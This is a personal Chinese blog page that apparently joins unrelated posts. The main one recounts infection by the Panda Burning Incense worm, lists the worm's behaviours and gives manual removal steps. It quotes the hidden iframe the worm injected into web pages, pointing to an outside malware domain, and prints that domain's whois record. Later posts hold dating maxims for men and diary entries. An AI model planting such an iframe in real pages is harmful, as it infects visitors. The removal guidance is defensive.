鬼谷子——鬼蜮

本站停止更新，转至hc133.com

      一直听到熊猫烧香在肆虐的消息，但是都没有机会碰到一台病机……。回家终于有机会参观了同学弃用的瘟机：exe文件图标全部变为熊猫烧香，并在启动不到5分钟之后便蓝屏宕机……。后来家里的机器也由于移动硬盘的不慎使用，也加入了瘟机一族，而且是不改变图标的小变种（这时突然发现，在防御互联网病毒感染的意识以及软件水平的不断提高下，移动设备已经成为一个重大的病毒传播渠道）。

病毒特征（修改自：静·谧——Last Winner ）：

A、自动终止对其有危害的进程
·自动终止Norton、金山毒霸、瑞星等杀毒程序进程
·自动关闭任务管理器和注册表编辑器。如果你想打开任务管理器，病毒会立即将其关闭——也正是这一点使我怀疑机器中招，不过当初没有考虑使用其他任务管理器来查看：（
B、自动在每个盘符下生成autorun.inf和setup.exe，只要你一双击盘符，病毒就会自运行
C、自动扫描硬盘上所有目录，对扫描过的目录产生一个desktop_.ini文件，其中记录病毒扫描时的日期。并修改目录中有htm、html、 asp、jsp、php等网页文件的内容，在最后一行添加用iframe嵌套的一个挂马页面。我感染的是添加了<iframe src=http://www.krvkr.com/worm.htm width=0 height=0></iframe>，如果用户打开此文件并且同时连接互联网，那么就会遭到该病毒的攻击。
D、变种还会修改注册表，使得你无法在文件夹选项中选择“显示所有文件”来查看隐藏的病毒文件。
E、添加进程：spcolsv.exe，位于 %systemroot%\system32\drivers

杀毒方法：

      我先是下载了瑞星的专杀工具NimayaKiller，然后发现在正常进入系统之后根本就无法进行操作，即便是在安全模式下删除了相应的启动项之后也不行，因为启动的explorer.exe也感染了病毒。所以我转到安全模式下运行NimayaKiller杀毒，虽然结果是已经查杀病毒，但是重启正常进入系统之后也还是一样，觉得几乎没什么用处。

      因此，在安全模式下备份好文件之后，开始重装。

网上介绍的方法（来自：静·谧——Last Winner 未试验）：

请先拔掉网线或禁用网卡再进行操作！！！
A、终止病毒进程
由于病毒只根据进程名字来判断该进程是否对其有害，所以可以采用伪装来欺骗病毒
copy %systemroot%\regedit.exe %systemroot%\rrr.exe
copy %systemroot%\system32\taskmgr.exe %systemroot%\system32\taskmmm.exe
运行taskmmm.exe，在进程中终止之
运行rrr.exe，在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
和 HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run中清除病毒启动项


B、清除驱动器autorun项
在驱动器上点右键，选择打开。注意，一定不要双击，否则前功尽弃！！！
####点击菜单：工具->文件夹选项，在查看中将“隐藏受保护的操作系统文件(推荐)”前的勾去掉，并选中“显示所有文件和文件夹”
然后按确定
如果此时状态栏中仍然显示有XX个隐藏对象（没有状态栏的请在查看菜单中启用之），那么运行rrr.exe，
进入 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
将CheckedValue的值设为1（DWORD值）
然后再重新设置文件夹选项（见####处）
这样就可以看到根目录下的setup.exe和autorun.inf，删除之
反复操作直至所有驱动器下的病毒文件都被清除，包括U盘上的也要清除——偶今天承担传输软件任务的PUB的U盘，就被病毒感染了，不过被及时清除了

C、在硬盘上搜索desktop_.ini
大致看一下这些文件都分布在哪些目录下——当然，如果你的机器已经中毒多时，那就不必要看了，因为病毒有足够的时间把你的硬盘都扫描一遍
在含有这些文件的目录下，查找htm、html、asp、jsp、php等文件，这些文件的修改日期会几乎是同一时刻
请用记事本打开任意一个页面，滚动到最后，如果看到有iframe标签引用的未知页面，请将这段文字复制
然后打开UltraEdit，在菜单serach->relplace in files中，将该字符串设置为要替换的字符串，替换为空
文件类型为*.ht*;*.jsp;*.php;*.asp（可能根据实际需要还得继续添加文件类型），目录为C:
选项中选择Search sub directories（搜寻子目录）
替换完成后，将C:改为 D:、E:……直至完成所有驱动器下文件的替换
同样，包括U盘上也要这么做

文件替换完成后，将搜索到的desktop_.ini按照时间顺序排序，看最早的一个修改日期是什么时候，记录为first_date
然后将这些desktop_.ini全部删除


D、病毒可能会修改硬盘上的可执行文件
搜索*.exe，修改日期为first_date到今天
点右键查看文件属性，如果缺少“版本”选项卡，而且文件图标为熊猫烧香或者为无图标，那大致可以肯定这是被感染过的文件，可以直接删除——最多就是误删，那重新安装一下程序就好了。（被感染过的文件无法正常运行，一运行实际上就让病毒复活了，但我们真正想执行的程序却无法启动）


E、还有需要注意的，系统中不应有空口令和弱口令帐户
即便你禁止了该帐户，病毒还是可以通过他进行传播

在下图有个要修改的地方：kaspersky 6.0个人版查出来的是Win32/Fujacks 

 

      建议大家在自己的U盘等设备上添加autorun.inf自启动项——由于病毒一般都是通过添加自启动项，在用户双击盘符之后运行——因此我们可以添加图标启动项，一旦发现盘符上的图标不出现，或者被篡改，便要小心行事，对盘符点击右键，选择打开，而不是auto。这样可以提醒用户注意自己的U盘是否被传染。但是我碰到的一个exception:soundmix.exe病毒在感染到U盘增加自启动项之后右击盘符，首选项依然是打开，但是打开后却会运行，可惜的是当时也忘了看他的autorun.inf文件的内容…………。

      说到soundmix.exe就搞笑，他修改注册表，不允许查看隐藏文件，自创建启动项，无法在任务管理器中终止此进程，修改host文件，复制病毒至%systemroot%\system32下（具体文件名忘记了：（）……但是他却一直在C盘根目录下试图访问一个stop.txt或stop1.txt的文件，一旦发现便立即终止运行。所以，大家看到这个进程在你的电脑中运行之后不妨在C盘下创建stop.txt，stop1.txt，然后进行大扫除。

      附：

   Domain Name: KRVKR.COM
   Registrar: XIN NET TECHNOLOGY CORPORATION
   Whois Server: whois.paycenter.com.cn
   Referral URL: http://www.paycenter.com.cn
   Name Server: NS11.BIGWWW.COM
   Name Server: NS12.BIGWWW.COM
   Status: ok
   Updated Date: 31-oct-2006
   Creation Date: 31-oct-2006
   Expiration Date: 31-oct-2007

   Domain Name:krvkr.com

   Registrant: 
   Luo
 China HuBei Wuhan JieFangDaDao568
 430000
 湖北省武汉市解放大道568号

转自【属于我的天空】

     1.男人是社会的主体，不管你信或不信。所以男人应该有种责任感。
　　　　
　　2. 25岁之前，请记得，爱情通常是假的，或者不是你所想象的那样纯洁和永远。如果你过了25岁，那么你应该懂得这个道理。 
　　　　
　　3. 吃饭7成饱最舒服。对待女友最多也请你保持在7成。
　　　　
　　4. 30岁之前请爱惜自己的身体，前30年你找病，后30年病找你。如果你过了30岁，你自然也会懂得这个道理。 
　　　　
　　5. 事业远比爱情重要。如果说事业都不能永恒，那么爱情只能算是昙花一现。 
　　　　
　　6. 不要轻易接受追求你的女孩。女追男隔层纱。如果你很容易就陷进去，你会发现你会错过很多东西，失去很多东西。 
　　　　
　　7. 请你相信，能用钱解决的问题，都不是问题。如果你认为钱索王道，有钱有女人，没钱没女人，那么。女人不是问题。 
　　　　
　　8 . 请永远积极向上。每个男人都有他可爱的地方，但是不可爱的地方只有不积极面对生活。 
　　　　
　　9. 不要连续2次让同一个女人伤害。好马不吃回头草，是有他道理的。如果认真考虑过该分手，那么请不要做任何舍不得的行动。 
　　　　
　　10. 如果你和你前女友能做朋友，那么你要问自己：为什么？如果分手后还是朋友，那么只有2个可能:。你们当初都只是玩玩而已，没付出彼此最真的感情。或者：必定有个人是在默默的付出无怨无悔！ 
　　　　
　　11. 永远不要太相信女人在恋爱时的甜言蜜语。都说女人爱听甜言蜜语，其实，男人更喜欢。 
　　　　
　　12. 请不要为自己的相貌或者身高过分担心和自卑。人是动物，但是区别于动物。先天条件并不是阻挡你好好生活的借口。人的心灵远胜于相貌，请相信这点。如果有人以相貌取人，那么你也没必要太在意。因为他从某种意义来讲，只是只动物。你会跟动物怄气吗？ 
　　　　
　　13. 失恋时，只有2种可能，要么你爱她她不爱你，或者相反。那么，当你爱的人不再爱你，或者从来没爱过你时。你没有遗憾，因为你失去的只是一个不爱你的人。 
　　　　
　　14. 请不要欺骗善良的女孩。这个世界上，善良的女孩太少。 
　　　　
　　15. 不能偏激的认为金钱万能，至少，金钱治不好艾滋病。 
　　　　
　　16. 请一定要有自信。你就是一道风景，没必要在别人风景里面仰视。 
　　　　
　　17. 受到再大的打击，只要生命还在，请相信每天的太阳都是新的。 
　　　　
　　18. 爱情永远不可能是天平。你想在爱情里幸福就要舍得伤心。 
　　　　
　　19. 如果你喜欢一个认为别人应该对她好的mm，请尽早放弃。没有人是应该对一个人好的。如果她不明白这个道理，也就是她根本不懂得珍惜。 
　　　　
　　20. 不要因为寂寞而找gf，寂寞男人请要学会品味寂寞。请记住：即使寂寞，远方黑暗的夜空下，一定有人和你一样，寂寞的人不同，仰望的星空却是唯一。 
　　　　
　　21. 任何事没有永远。也别问怎样才能永远。生活有很多无奈。请尽量充实自己，充实生活。请善待生活。

在mail.google.com中直接点击加入Gmail即可……估计是google扩大用户数量的一招，缩短邮箱用户上与微软雅虎的差距……

update:

2007年2月14日情人节，Gmail（http://www.gmail.com/）全球同步开放注册。

原来如此……落伍了……

RT,电信你Y的早就该让电通进来,再瓜分掉你南方市场.

今天（指2006年12月2日）犯了一个不可饶恕的错误：竟然因为睡过头了而错过考试时间！
这真是一个极大的错误。
回想起来，似乎是当时闹钟响过之后，我习惯性的把它往被子里塞，而后继续困觉。但这些都感觉像在做梦般的出现而已。
想想，当初为了这个考试，花了一天时间去报名，报名费184元（含车费），虽然说之后没有专门每天抽时间去复习，但是快考试的前一天（即昨天）全天的佛脚突击，加上前天的一个晚上的预热突击以及今天一天懊悔的时间，一共是3.5*24=60小时（含报名时间），为此遭受的脑水消耗不可估量。而这些损失给我带来的只有少数的几个词，还是特专业的词，如：集体所有制（collective ownership）、家庭承包责任制（the household contract responsibility system）、一国两制方针和基本法（the principle of "one country, two systems" and the Basic Law）....
综上计算，直接经济损失达RMB190余（含为了开电脑而消耗的电能），间接损失达RMB10000余。
这是第一次因自己的错误错过考试，希望也将是最后一次。
为了达到这个目标，因此，今后听到自己的闹钟之后都要立刻清醒起来，违者杀无赦！
When I wrote "!",it's always serious.